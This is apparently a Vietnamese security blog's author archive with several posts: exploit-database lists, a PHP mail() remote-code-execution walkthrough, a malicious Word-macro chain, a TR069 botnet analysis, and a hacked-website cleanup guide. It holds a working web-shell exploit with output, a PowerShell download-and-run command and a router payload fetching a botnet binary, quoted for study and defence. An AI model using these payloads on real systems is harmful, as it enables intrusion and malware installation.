Author Archives: hungnv

Tổng hợp tài nguyên để tìm mã khai thác trong quá trình kiểm thử bảo mật

Trong quá trình đánh giá bảo mật, kiểm thử hoặc học tập, cài đặt LAB, hoặc đánh giá mức độ rủi ro, chúng ta thường phải tìm mã khai thác. Bài viết này sẽ giới thiệu một số tài nguyên và phương pháp tìm mã khai thác trong quá trình kiểm thử bảo mật.

anonymous-darkweb-hosting
Lưu ý:

  • Đừng bao giờ tin tưởng vào mã khai thác bạn tìm thấy trên internet. Mã khai thác có thẻ chứa backdoor hoặc thực thi rm -rf / trên máy của bạn.
  • Chú ý đến luật pháp khi sử dụng mã khai thác
  • Mã khai thác đã được biên dịch có thể chứa bất cứ thứ gì. Hãy kiểm tra code trong môi trường lab được theo dõi trước khi đưa nó vào bộ công cụ của bạn.

Thông tin chi tiết lỗ hổng bảo mật:
Một số website sau có thể có ích khi tìm thông tin về lỗ hổng bảo mật:

  • CVEDetails.com https://www.cvedetails.com/
  • ITSecDB.com http://www.itsecdb.com/
  • CVE-Search http://cve-search.org/

Tham gia Mailing Lists

  • http://www.openwall.com/lists/oss-security/
  • http://seclists.org/

Exploit Search Engines

  • ExploitSearch.net
  • Exploit-DB.com
  • 0day.today
  • PacketStormSecurity.com
  • SecurityFocus.com

Một số exploit Sites khác:

  • Brakertech.com
  • CXSecurity.com
  • ExploitAlert.com
  • Iranian Exploit Database http://iedb.ir/
  • RouterPwn.com
  • SeeBug.org
  • SecuriTeam.com
  • SecurityPhresh.com
  • SecurityVulns.com
  • Vulnerability-Lab.com
  • Vulners.com
  • WpVulnDB.com
  • Zero Day Initiative:
    http://zerodayinitiative.com/advisories/published/
    http://zerodayinitiative.com/advisories/upcoming/

Premium Exploit Packs

  • ExploitPack.com:
    http://exploitpack.com/
    http://exploitpack.com/ExploitList.txt

Một số trang tổng hợp mã khai thác theo thể loại:

bots, C2 servers, và malware khác

  • malSploitBase
    https://github.com/misterch0c/malSploitBase
  • PwnMalw.re
  • ThreatRoast.com
  • Mã khai thác game: http://aluigi.altervista.org/poc.htm

Mã khai thác local privilege escalation

  • Unix-PrivEsc https://github.com/FuzzySecurity/Unix-PrivEsc
  • Tarantula.by.ru https://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/
  • LinuxNote.org http://exploit.linuxnote.org/
  • Unix-Privilege-Escalation-Exploits-Pack https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack
  • 0xdeadbeaf.info http://www.0xdeadbeef.info/#exploits

Công cụ tìm kiếm mã khai thác:

  • Pompem (github) https://github.com/rfunix/Pompem
  • findsploit (github) https://github.com/rfunix/Pompem

Công cụ gợi ý mã khai thác:

  • AutoLocalPrivilegeEscalation https://github.com/ngalongc/AutoLocalPrivilegeEscalation
  • LinEnum https://github.com/rebootuser/LinEnum
  • Linux_Exploit_Suggester.pl https://github.com/PenturaLabs/Linux_Exploit_Suggester
  • linuxprivchecker.py https://github.com/sleventyeleven/linuxprivchecker
  • unix-privesc-check https://github.com/pentestmonkey/unix-privesc-check
  • windows-exploit-suggester.py https://github.com/GDSSecurity/Windows-Exploit-Suggester
  • windows-privesc-check https://github.com/pentestmonkey/windows-privesc-check

Khai thác lỗ hổng thực thi lệnh từ xa trong hàm mail() của PHP

Thời gian gần đây mã khai thác lỗ hổng PHP mail() remote code execution trong Roundcube 1.2.2, đã được phát hiện và công bố bởi RIPS Technologies.Roundcube đã ra bản vá ngay sau đó trong phiên bản 1.2.3: https://roundcube.net/news/2016/11/28/updates-1.2.3-and-1.1.7-released

Gần đây nhất là phát hiện lỗ hổng này trong PHPMailer: PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033).

Lỗ hổng trong PHPMailer: PHPMailer < 5.2.20 Remote Code Execution

Lỗ hổng trong SwiftMailer: SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)

Lỗ hổng trong Zend Framework: Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)

Ở bài viết này, chúng ta sẽ phân tích cách mà hacker có thể khai thác lỗ hổng này trong hàm mail() php.

Khi sử dụng PHP để gửi emails, chúng ta có thể sử dụng hàm mail() có sẵn trong php. Hàm này có tổng cộng 5 tham số:

To
Subject
Message
Headers (Optional)
Parameters (Optional)

Tham số thứ 5 có thể được dùng để truyền các tham số như khi chạy dòng lệnh để chạy chương trình đã được cấu hình để gửi mail, đã được cấu hình bởi thông số sendmail_path.
Một số tham số :

-O option=value
Set một giá trị xác định cho option
-C file
chỉ định sử dụng config file
-X logfile
Log tất cả traffic in, out vào log file.
QueueDirectory=queuedir
Chọn thư mực để lưu queue messages.

Đoạn code sau được sử dụng để khai thác lỗ hổng trong hàm mail:

$to = ‘a@b.c’;
$subject = ‘<?php system($_GET[“cmd”]); ?>’;
$message = ”;
$headers = ”;
$options = ‘-OQueueDirectory=/tmp -X/var/www/html/rce.php’;
mail($to, $subject, $message, $headers, $options);

Thử xem nội dung file rce.php

> cat rce.php
11226 <<< To: a@b.c
11226 <<< Subject:
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<

Thử thực thi một số lệnh, chúng ta vào http://localhost/rce.php?cmd=ls%20-la và được kết quả:

11226 <<< To: a@b.c
11226 <<< Subject: total 20
drwxrwxrwx 2 *** *** 4096 Sep 3 01:25 .
drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 ..
-rw-r–r– 1 *** *** 92 Sep 3 01:12 config.php
-rwxrwxrwx 1 *** *** 206 Sep 3 01:25 mailexploit.php
-rw-r–r– 1 www-data www-data 176 Sep 3 01:27 rce.php
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<
11226 <<<
11226 <<<
11226 <<< [EOF]

Phân tích :
Đầu tiên ta đổi thư mục đợi mail thành /tmp với tham số -O và QueueDirectory , tiếp theo đổi đường dẫn và tên file log đổi thành /var/www/html/rce.php với tham số -X
Khi hàm mail() thực thi, sẽ khởi tạo file log rce.php với các nội dung như trên.

Khai thác đọc file trên server

Một cách khác để khai thác lỗi này là đọc file trực tiếp trên server bằng cách sử dụng tham số -C

$to = ‘a@b.c’;
$subject = ”;
$message = ”;
$headers = ”;
$options = ‘-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.tx’;
mail($to, $subject, $message, $headers, $options);

Sau khi thực thi hàm mail, file evil.txt được tạo với nội dung như sau:

11124 >>> /var/www/html/config.php: line 1: unknown configuration line “<?php”
11124 >>> /var/www/html/config.php: line 3: unknown configuration line “dbuser = ‘someuser’;”
11124 >>> /var/www/html/config.php: line 4: unknown configuration line “dbpass = ‘somepass’;”
11124 >>> /var/www/html/config.php: line 5: unknown configuration line “dbhost = ‘localhost’;”
11124 >>> /var/www/html/config.php: line 6: unknown configuration line “dbname = ‘mydb’;”
11124 >>> No local mailer defined

Có rất nhiều thông tin nhạy cảm chúng ta có thể lấy được từ server.

Nhận diện code có thể có lỗ hổng:

Cách nhanh nhất để nhận diện code có lỗ hổng là sử dụng lệnh grep trong Linux và tìm kiếm hàm mail() với 5 tham số được sử dụng.
Câu lệnh như sau:

grep -r -n –include “*.php” “mail(.*,.*,.*,.*,.*)” *

Nếu quản trị web và các nhà phát triển sử dụng PHPMailer hay Roundcube, hãy kiểm tra lại code của mình và cập nhật code lên phiên bản mới nhất .

 

 

 

Tìm hiểu phương thức tấn công qua email và các cách xử lý

Thời gian gần đây chúng ta gặp rất nhiều các tài liệu word chứa mã độc được gửi qua email. Trong trường hợp này chuỗi thực hiện các tấn công sẽ là :

Email -> Word Doc -> Cmd.exe -> PowerShell -> Malware.exe

Khi người dùng nhấp chuột vào file đính kèm nó sẽ chạy một macro chạy lệnh PowerShell như sau:

cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile(‘http://www.tessaban.com/images/images/gfjfgklmslifdsfnln.png’,’%TMP%\scsnsys.exe’);Start-process ‘%TMP%\scsnsys.exe’;

Khi phân tích cách PowerShell tạo kết nối web, không có gì đặc biệt xảy ra trên mạng, Powershell không có chuỗi user-agent, rất khó để phát hiện.

GET /images/images/gfjfgklmslifdsfnln.png HTTP/1.1
Host: www.tessaban.com
Connection: Keep-Alive

Khi chúng ta hiểu được phương thức tấn công, chúng ta có thể ngăn chặn các cuộc tấn công sử dụng một trong các cách sau:
1. Dừng việc chuyển email
– Giữ file đính kèm vài giờ cho đến khi antivirus phát hiện ra
– Convert file sang định dạng khác (ví dụ word -> pdf)
– Xử lý macro trước khi chuyển email.
– Phân tích file đính kèm trước khi chuyển email.
– Ngăn chặn việc chạy macro
2. Chặn macro thông qua GPO
3. Chặn người dùng sử dụng cmd (sử dụng chính sách của AppLocker)
3. Chặn Powershell chạy các script lạ
4. Chặn download malware
5. Chặn Malware chạy trong thư mục tạm (C:\Users\me\AppData\Local\Temp\) sử dụng AppLocker

Ví dụ chúng ta có thể sử dụng chặn Powershell kết nối mạng sử dụng Windows Firewall bằng cách thêm vào firewall 2 rules như sau:

Name || Profile || Enabled || Action || Program || Local Address || Remote Address || Protocol || Local Port || Remote Port

Powershell1 || All || Yes || Block || %SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe || Any || Any || Any || Any || Any
Powershell2 || All || Yes || Block || %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe || Any || Any || Any || Any || Any

Phân tích nhanh TR069 Botnet

Phân tích nhanh TR069 Botnet

Một mã độc khai thác TR069 được công bố gần đây đang được khai thác trên diện rộng. Thực hiện phân tích nhanh một số mẫu tải về sử dụng Docker, Qemu và Tcpdump, ta thu được tên miền C&C là tr069[.]support and tr069[.]online

Giới thiệu

Một vài bài viết về lỗ hổng TR069 xuất hiện gần đây:
http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/
Recent vulnerability in Eir D1000 Router used to spread updated version of Mirai DDoS bot
https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

Hàng triệu router tồn tại lỗ hổng Remote code Execution, các router này đều do Zyxel và Speedport sản xuất. Nguyên nhân là cổng 7547 trên router được mở để nhận lệnh qua giao thức TR-069 và TR-064 (giao thức để các ISP quản lý thiết bị từ xa).
Để thực hiện phân tích, ta setup một web server chạy trên cổng 7547, và forward cổng TCP 7547 qua router.

Phân tích

Chưa đầy 5 phút đã có những requests độc hại được nêu trong các bài viết trên, một số requests có dạng như sau:
Code:
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 519

<?xml version=”1.0″?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/”
SOAP ENV:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”>
<SOAP-ENV:Body>
<u:SetNTPServers xmlns:u=”urn:dslforum-org:service:Time:1″>
<NewNTPServer1>`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>
</u:SetNTPServers>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Lệnh khai thác lỗ hông RCE được chèn vào:

<NewNTPServer1>`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`</NewNTPServer1>

Gửi requests download tới các url từ 1-10 hxxp://srrys[.]pw/1 tới hxxp://srrys[.]pw/10 , ta thu được 7 file, có thông tin như sau:

$ file *
1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
2: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
3: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
5: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
6: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
7: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped

…mã SHA256 hashes…

971156ec3dca4fa5c53723863966ed165d546a184f3c8ded008b029fd59d6a5a 1
9f9c38740568cbe1fbb8171b1ad4221c43790ff106623555868abf76f9672e53 2
1fce697993690d41f75e0e6ed522df49d73a038f7e02733ec239c835579c40bf 3
828984d1112f52f7f24bbc2b15d0f4cf2646cd03809e648f0d3121a1bdb83464 4
c597d3b8f61a5b49049006aff5abfe30af06d8979aaaf65454ad2691ef03943b 5
046659391b36a022a48e37bd80ce2c3bd120e3fe786c204128ba32aa8d03a182 6
5d4e46b3510679dc49ce295b7f448cd69e952d80ba1450f6800be074992b07cc 7

Nếu đã từng theo dõi các mối đe dọa từ IoT thì sẽ thấy điều này quen thuộc, mã độc được biên dịch lại cho nhiều kiến trúc khác nhau, như trong ví dụ này: https://github.com/eurialo/lightaidra

Sử dụng phần mềm Radare2 để dịch ngược , thu được;

$ r2 1
Warning: Cannot initialize dynamic strings
— Change the graph block definition with graph.callblocks, graph.jmpblocks, graph.flagblocks
[0x00400260]> aa
[x] Analyze all flags starting with sym. and entry0 (aa)

Code MIPS assembly, đã được obfuscated.

Phân tích malware động MIPS

Thuật ngữ “phân tích malware động” chỉ đề cập đến quan sát một phần của hành vi malware khi nó được thực hiện.
Để thực hiện, sẽ mô phỏng một thiết bị MIPS sử dung Qemu. Qemu là phần mềm mô phỏng, có khả năng mô phỏng nhiều loại phần cứng khác nhau. Qemu-mips: https://hub.docker.com/r/asmimproved/qemu-mips/
Docker là một công nghệ giúp dễ dàng chạy phần mềm mà không cần lo lắng về những thứ cấu hình phức tạp
Sử dụng docker với lệnh như sau:

$ docker run -it asmimproved/qemu-mips
root@0a5f2731be8e:/project#

Từ shell có được, chạy tcpdump để bắt đầu capture traffic ra file pcap

root@0a5f2731be8e:/project# tcpdump -w capture.pcap -n -U

Từ một cửa sổ lệnh khác, cấp quyền thực thi cho mẫu mã độc, và thực thi bằng lệnh sau:

$ docker exec -ti peaceful_spence bash
root@0a5f2731be8e:/project# chmod +x 1
root@0a5f2731be8e:/project# qemu-mipsel ./1

Kiểm tra file pcap khi mã độc thực thi, ta thấy mã độc scan một số IP với cổng 7547 và 5555 để mở rộng lây nhiễm.
Từ file pcap cũng tìm được 2 tên miền C&C là tr069[.]support and tr069[.]online


Kiểm tra thông tin whois của tên miền, thấy chúng đều mới được đăng ký:

$ whois tr069.support
Domain Name: tr069.support
Domain ID: fec618e5a8fd4ac7bbc5597a04696b08-DONUTS
WHOIS Server: www.gandi.net/whois
Referral URL: https://www.gandi.net
Updated Date: 2016-11-29T10:40:22Z
Creation Date: 2016-11-29T10:40:22Z

Kết Luận
Mã độc này không có gì phức tạp. Nó có thể không ảnh hưởng tới Network, nhưng một lượng lớn thiết bị có lỗ hổng trên Internet là cả một vấn đề. Đây là cách mà botnet xảy ra, và cũng là cách thực hiện các cuộc tấn công DDOS lớn xảy ra gần đây.

Hướng dẫn kiểm tra xử lý khi website bị hack

Bài viết sau đây cung cấp cho bạn các phương pháp để bảo vệ website của mình cũng như những hướng dẫn cơ bản kiểm tra website khi website bị hack.

Your_Site_Has_Been_Hacked

    1. Dấu hiệu phát hiện website bị hack

Thông thường khi một website bị hack sẽ có các dấu hiệu dễ nhận biết sau:

  • Website bị thay đổi nội dung (deface)
  • Trong mã nguồn bị upload shell hoặc bị chèn một số đoạn mã, script lạ do hacker chèn vào.
    Có thể sử dụng công cụ Website malware scanner của hãng bảo mật Sucuri để phát hiện các mã độc mà hacker đã chèn vào wesite của, tại địa chỉ:https://sitecheck.sucuri.net/
  • Khi truy cập vào website thì thường xuyên bị redirect qua các website độc hại, website quảng cáo
  • Bị cảnh báo blacklist bởi Google, Bing, McAfee
  • Cảnh báo trong kết quả search Google
  • Xuất hiện kết quả spam trên công cụ tìm kiếm google, bing..
  • Nhận được thông báo hosting bị khóa bởi nhà cung cấp.

    2. Nguyên nhân
Để xác định được rõ nguyên nhân thì cần điều tra cụ thể trong từng trường hợp, nhưng website bị hack thông thường do những nguyên nhân sau:

– Đặt mật khẩu quản trị quá yếu, thiếu cơ chế chống brute force khiến kẻ tấn công có thể dò password admin, hoặc để lộ mật khẩu trong quá trình sử dụng
– Cài đặt các theme, module, plugin, extension,…bản null, không rõ nguồn gốc, kém an toàn
– Dùng mã nguồn phiên bản cũ với nhiều lỗi bảo mật, hacker có thể tấn công và khai thác lỗi
– Tấn công local attack tại các server share hosting (Linux share hosting tại vnptdata.vn hiện tại sử dụng hệ điều hành CloudLinux có thể ngăn chặn được dạng tấn công này)

3. Kiểm tra và xử lý
Khi website bị hack, webmaster cần bình tĩnh và thực hiện các bước sau để kiểm tra và xử lý:

Bước 1. Cách ly website

Trước tiên bạn cần sao lưu backup lại trạng thái của website để phục vụ các bước điều tra sau này. Bạn hãy liên hệ ngay với nhà cung cấp để được hỗ trợ kiểm tra , cung cấp các bản backup.
Bạn có thể thay thế trang chủ bởi nội dung “Website đang được bảo trì và nâng cấp, Xin vui lòng quay lại sau!” hoặc chặn tất cả các kết nối đến website sử dụng firewall hoặc .htaccess.
Tiếp đó bạn cần kiểm tra lại các tài khoản trên hệ thống xem hacker có tạo mới tài khoản không, nếu có thì xóa các tài khoản đó đi, đồng thời thực hiện thay đổi tất cả các thông tin tài khoản hiện tại bao gồm: tài khoản website, database, tài khoản quản lý hosting, FTP, encryption key..

Bước 2. Khôi phục lại hoạt động của website.

Trong trường hợp bạn có bản sao lưu của mã nguồn hoàn chỉnh, bạn có thể thực hiện restore lại website để website trở lại hoạt động.
bạn có thể kiểm tra các file bị sửa đổi trên website so với bản backup sử dụng câu lệnh sau:
# diff -qr <current-directory> <backup-directory>
Ví dụ:
# diff -qr www/ backups/full-backup/

Trong trường hợp bạn không có bản sao lưu hoàn chỉnh, bạn có thể sử dụng các câu lệnh sau để tìm file bị hacker sửa đổi:

  • Lệnh tìm và sắp xếp các file theo thời gian bị sửa đổi:

$ find /var/www/html -type f -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort -r

  • Lệnh tìm các file bị sửa đổi trong vòng 60 phút
    $ find /var/www/html -type f -mmin -60
  • Lệnh tìm các file bị sửa đổi trong vòng 7 ngày trước
    $find /var/www/html -type f -mtime -7
  • Lệnh tìm các file bị sửa đổi trong vòng 60 phút và hiển thị các thuộc tính của file để phục vụ điều tra:
    $ find /var/www/html -type f -mmin -60 -exec ls -al {} \;
    Hoặc :
    $ find /var/www/html -type f -mmin -60 | xargs ls -al

Bước 3. Làm sạch website

Ở bước 2, bạn đã xác định được các file đã bị thay đổi trong mã nguồn, bạn cần kiểm tra kỹ lại các file này.
Các file backdoors hacker để lại thường có tên gần giống với mã nguồn của bạn, và nếu là mã nguồn php thì thường chứa các hàm PHP sau:

base64 passthru
base64_decode create_function
gzinflate(base64_decode, system
eval(gzinflate(base64_decode, assert
eval(base64_decode show_source
gzuncompress proc_open
eval stripslashes
exec preg_replace (with /e/)
shell_exec move_uploaded_file
pcntl_exec

Nếu bạn sử dụng máy chủ hoặc sử dụng hệ điều hành Linux thì có công cụ Linux Malware Detect (LMD) rất hay và dễ sử dụng trong việc tìm kiếm các loại mã độc.

Bạn cũng có thể download mã nguồn về máy và dùng các phần mềm antivirus để kiểm tra
Các phần mềm có trả phí (Paid): BitDefender, Kaspersky, Sophos, F-Secure.
Các phần mềm miễn phí (Free): Malwarebytes, Avast, Microsoft Security Essentials, Avira.

Làm sạch Database: Hacker có thể lưu trữ backdoor ở trong database, bạn cần mở database và tìm kiếm trong các bảng các từ khóa spam hoặc các hàm php. Lưu ý bạn nhớ backup database trước khi thực hiện.

Gỡ bỏ blacklist: Nếu bạn bị blacklisted bởi Google, McAfee, Yandex (Hoặc bất kì các tổ chức chống spam nào khác), bạn có thể gửi yêu cầu xem xét gỡ bỏ blacklist sau khi bạn đã kiểm tra và gỡ bỏ mã độc khỏi website.

Bước 4: Điều tra nguyên nhân website bị hack

Đây là bước khó nhất, nó đòi hỏi kinh nghiệm và kiến thức để có thể kiểm tra chính xác nguyên nhân và cách khắc phục. Bài viết này chỉ cung cấp cho bạn một số bước cơ bản để kiểm tra và xác định nguyên nhân:

Kiểm tra network để kiểm tra các kết nối và traffic bất thường:
root@secureserver:/var/www/html/# netstat -nputw

Kiểm tra trong access_log hay error_log tìm kiếm tất cả các thông tin liên quan đến việc website bị tấn công.
Với hosting sử dụng CPanel thì access_log thường nằm trong thư mục ~/access-log, với vps hoặc máy chủ vật lý thì thường nằm ở thư mục /var/log/httpd (hoặc /var/log/nginx hoặc /var/log/apache)
Log thường có định dạng như sau:

IP_ADDRESS – – [Date_Time Timezone] “HTTPMETHOD /URL HTTP_VERSION” HTTP_RESPONSE_CODE HTTP_LENGHT “REFERER” “USER AGENT”

Ví dụ:
66.249.75.219 – – [08/Jul/2015:16:22:24 +0700] “GET / HTTP/1.1” 200 255 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”

Kinh nghiệm: Bạn có thể dựa vào thời điểm file index bị chỉnh sửa deface, thời điểm file shell được hacker upload lên để tìm ra điểm bất thường hoặc upload file thường phải dùng POST request
Ví dụ:
Tìm tất cả các access_log truy cập trong ngày 08/Jul/2015
root@secureserver:/var/logs/httpd/# cat access_log |grep “08/Jul/2015” | more
Tìm các truy cập vào trang admin
root@secureserver:/var/logs/httpd/# cat access-log |grep -E “wp-admin|wp-login|POST /” | more
Hoặc
root@secureserver:/var/logs/httpd/# cat access-log |grep wp-login|grep “POST /”| more

188.163.91.92 – – [24/Jun/2015:14:00:40 -0500] “POST /wp-login.php HTTP/1.1” 302 – “-” “Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2”

Kiểm tra ip , ta biết được IP đến từ Ukraine

   $ whois 188.163.91.92
     route: 188.163.64.0/18
    descr: Kyivstar GSM, Kiev, Ukraine
    origin: AS15895
    mnt-by: KYIVSTAR-MNT

Kiểm tra tất cả các access_log liên quan đến ip này

     root@secureserver:/var/logs/httpd/# cat access-log | grep ^188.163.91.92 | more

188.163.91.92 – – [14/Dec/2014:00:12:07 -0500] “GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0” 200 49913 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0)
188.163.91.92 – – [24/Jun/2015:14:00:41 -0500] “GET /wp-admin/ HTTP/1.1” 200 49913 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2”
188.163.91.92 – – [24/Jun/2015:14:00:44 -0500] “GET /wp-admin/ HTTP/1.1” 200 49913 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2”
188.163.91.92 – – [24/Jun/2015:14:00:45 -0500] “GET /wp-admin/theme-editor.php HTTP/1.1” 200 49286 “-” “Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2”

Trong ví dụ trên , từ access_log ta có thể phát hiện được hacker khai thác qua lỗ hổng revslider, download file wp-config.php, sau đó login vào trang quản trị admin và chỉnh sửa theme

Bạn nên kiểm tra lại mã nguồn đang dùng có đang tồn tại lỗ hỗng bảo mật nào không, các module, plugin được cài lên website có an toàn không, bạn cũng có thể sử dụng các công cụ bảo mật Acunetix, Nikto, OpenVAS để kiểm tra lại các lỗ hổng của website.

Sau khi đã biết được cách mà hacker đã khai thác, tấn công website bạn cần vá lại các lỗ hổng mà hacker đã khai thác, cập nhật các bản vá mới mới nhất cho mã nguồn và phần mềm để fix các lỗi bảo mật.

Sau đó ban kiểm tra lại lần cuối và tạo một bản backup để sử dụng khi cần thiết

4. Một số lời khuyên để website an toàn hơn
– Backup dữ liệu – Việc tối thiểu phải làm:
Nếu bây giờ website của bạn chưa bị hacker viếng thăm nhưng chưa sử dụng các phương thức sao lưu dữ liệu dự phòng thì hãy làm ngay bây giờ, càng sớm càng tốt và sao lưu càng thường xuyên càng tốt.
– Luôn đặt mật khẩu phức tạp để đăng nhập và đổi mật khẩu định kỳ. Xem hướng dẫn đặt mật khẩu và sử dụng mật khẩu an toàn http://vnptcert.vnpt.vn/huong-dan-dat-va-su-dung-mat-khau-toan/
– Không nên cài đặt các theme, module, plugin, extension,… bản null, không thật sự cần thiết và không rõ nguồn gốc,
– Thường xuyên update mã nguồn lên phiên bản mới nhất để hạn chế các lỗi bảo mật trong các phiên bản trước

Tạp chí SC Magazine Europe công bố giải thưởng SC Awards 2016

Tạp chí SC Magazine Europe công bố giải thưởng SC Awards 2016

SC Magazine Awards

SC Magazine Awards

Mỗi năm, giải thưởng SC tôn vinh những đóng góp xuất sắc nhất trong ngành công nghiệp an ninh thông tin.
Dưới đây là danh sách các giải pháp giành được giải thưởng của năm 2016:

Giải pháp phòng chống Advanced Persistent Threat(APT) tốt nhất: Advanced Persistent Threat Protection của FireEye
Các giải pháp khác cũng được đánh giá cao: Enterprise Immune System by Darktrace
Best Behaviour Analytics/Enterprise Threat Detection: Gurucul
Các giải pháp khác cũng được đánh giá cao: Vectra Networks
Giải pháp Cloud Computing Security tốt nhất: CipherCloud 
Các giải pháp khác cũng được đánh giá cao: SendSafely
Giải pháp Email Security tốt nhất: Glasswall Solutions 
Các giải pháp khác cũng được đánh giá cao: TRITON AP-Email của Forcepoint 
Giải pháp Fraud Prevention tốt nhất: Total Fraud Protection của Easy Solutions 
Các giải pháp khác cũng được đánh giá cao: NuDetect by NuData Security
Giải pháp Identity Management tốt nhất: Shell Control Box 4 F2 by Balabit
Các giải pháp khác cũng được đánh giá cao: IBM Security Identity Governance and Intelligence (IGI) by IBM
Dịch vụ Managed Security tốt nhất: CNS Mosaic by CNS Group
Các giải pháp khác cũng được đánh giá cao: Các giải pháp khác cũng được đánh giá cao: Managed Threat Detection (MTD) Service by SecureData
Best Mobile Security Solution: IBM MaaS 360 Enterprise Mobility Management
Best Multifactor Solution: Winner: Swivel Secure
Các giải pháp khác cũng được đánh giá cao: Symantec Validation and ID Protection (VIP) by Symantec
Best NAC(Network Access Control) Solution: CounterACT by ForeScout
Các giải pháp khác cũng được đánh giá cao: Trustwave Network Access Control (NAC) by Trustwave
Best SIEM(Security Information and Event Management) Solution: AlienVault Unified Security Management by AlienVault 
Các giải pháp khác cũng được đánh giá cao: Splunk Enterprise Security by Splunk 
QRadar by IBM
– Best UTM(Unified Threat Management) Solution: Sophos SG Series UTM by Sophos 
Các giải pháp khác cũng được đánh giá cao: Check Point 600 Appliance by Check Point 
Best Data Leakage Prevention (DLP) Solution: Symantec Data Loss Prevention by Symantec 
Các giải pháp khác cũng được đánh giá cao: SmartCipher by Covertix 
Data Protection Platform by Digital Guardian
Adaptive Redaction by Clearswift
AP-DATA & AP-ENDPOINT by Forcepoint
Best Vulnerability Management Solution: Cloud Insight by Alert Logic
Các giải pháp khác cũng được đánh giá cao: Nessus Cloud by Tenable Network Security
Inside by Rapid7
Skybox Security
Best Web Content Management Solution: Blue Coat Secure Web Gateway by Blue Coat Systems
Các giải pháp khác cũng được đánh giá cao: Cloud Web Gateway by Sophos 

Một số hướng dẫn sử dụng dịch vụ Internet Banking an toàn

Vụ việc một khách hàng của Vietcombank bị hack 500 triệu trong tài khoản là một sự việc cực kỳ nghiêm trọng.
Dưới đây là một số hướng dẫn sử dụng dịch vụ Internet Banking an toàn giúp bạn bảo vệ chính túi tiền của mình.

  1.  KHÔNG cung cấp bất kỳ thông tin bảo mật dịch vụ như: Tên đăng nhập, mật khẩu truy cập, OTP ,địa chỉ email và thông tin cá nhân cho bất cứ ai và bằng bất cứ hình thức nào.
  2. KHÔNG đăng nhập hoặc cung cấp tên tài khoản NHĐT/ mật khẩu/ mã OTP trên bất kỳ ứng dụng và trang web nào không phải của ngân hàng
  3. KHÔNG cài đặt / sử dụng các ứng dụng liên kết ngân hàng bừa bãi, như trường hợp Vietcombank cảnh báo về ứng dụng Việt Money Lover là một ví dụ điển hình.
  4. Nếu sử dụng thẻ Visa Master thì nên đăng ký sử dụng tính năng VBV(Verified by Visa) hoặc MSC(MasterCard SecureCode)
    VBV - Verified By Visa

    VBV – Verified By Visa

    Master Card SecureCode

    Master Card SecureCode

    Nếu thẻ của bạn đã tham gia VBV hoặc MSC, trong quá trình giao dịch bạn được yêu cầu phải nhập Mật khẩu(Hoặc ngày sinh) để hoàn tất bước thanh toán. Mậu khẩu này do chính Ngân hàng của bạn cung cấp, nhằm đảm bảo an toàn cho giao dịch được thực hiện trên Internet. Sau khi nhập thông tin thẻ trong quá trình thanh toán. một cửa sổ mới sẽ xuất hiện yêu cầu bạn phải nhập Mật khẩu này. Nếu bạn nhập không chính xác hoặc đóng cửa sổ này, giao dịch thanh toán sẽ không thành công.

  5. Tiền mặt giao dịch được nên hạn chế để trong 01 thẻ, cần áp dụng theo quy tắc trứng để nhiều rổ, từ đó giảm được rủi ro, mất mát có thể xảy ra. Nên đăng ký sử dụng dịch vụ thông báo biến động số dư qua sms, khi thấy dấu hiệu bất thường cần báo cho Ngân hàng để được hộ trợ xử lý.
  6. Nếu thanh toán online bằng Intertnet Banking hoặc thanh toán bằng thẻ tín dụng, thẻ ghi nợ, thẻ trả trước, người dùng nên chọn các trang có cổng thanh toán uy tín như qua Paypal hoặc các hệ thống có uy tín như cleverbrige.
  7.  Khi thanh toán tại siêu thị, tại POS, người dùng nên quẹt thẻ trực tiếp, nhưng lưu ý nên dùng băng dính che lại số thẻ, chỉ để lại mặt từ cho máy quét.
